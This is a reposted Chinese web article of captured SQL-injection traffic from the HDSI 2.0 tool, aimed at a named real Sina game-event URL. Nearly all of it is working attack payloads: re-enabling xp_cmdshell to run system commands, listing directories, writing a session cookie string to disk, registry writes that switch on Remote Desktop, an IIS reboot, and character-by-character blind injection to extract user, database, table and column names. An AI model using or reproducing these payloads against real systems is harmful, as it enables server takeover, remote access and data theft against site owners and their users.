分享
 
 
 

hdsi2.0 sql注入部分抓包分析语句

王朝delphi·作者佚名  2006-01-09
窄屏简体版  字體: |||超大  

hdsi2.0 sql注入部分抓包分析语句

恢复cmd

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

执行命令:

sql: ;ipconfig -all--

dos:

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell

"ipconfig

-all"--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

列目录:

c: jiaozhu 临时表

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu

EXEC

MASTER..XP_dirtree "c:",1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

上传文件:

本地路径:C:\Inetpub\wwwroot\cook.txt 保存位置:c:

数据库存储过程:

;exec master..xp_cmdshell ' echo

cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%

20cdb_visitedfid=12;%2

0cdb_oldtopics=D8D>c:\'--

数据库备份:(上传后删除临时表)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH

DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

开启3389:

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\microsoft\windows\currentversion\netcache','enable','reg_sz','0';-

---

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'software\microsoft\windows

nt\currentversion\winlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'software\policies\microsoft\windows\installer','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'system\currentcontrolset\control

\terminal

servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'system\currentcontrolset\services\termservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.default\keyboard

layout\toggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

注入分析:数字型 SQL错误提示关闭 开启 access

使用关键字 宝石公园“你玩 我抽”中奖名单公布

http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

多句查询 支持

子查询 支持

权限 public

当前用户 dbo

当前库 event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

...

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

...

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

跨库:

猜解数据库:

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7

...

...

...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

...

...

...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master 不是sa权限,不能跨库

猜解表名:

EventCategory

GET

and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

猜解列名:

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62

and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where

A.id=B.id and

B.name='EventCategory' order by A.name desc) T order by name asc )<35

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有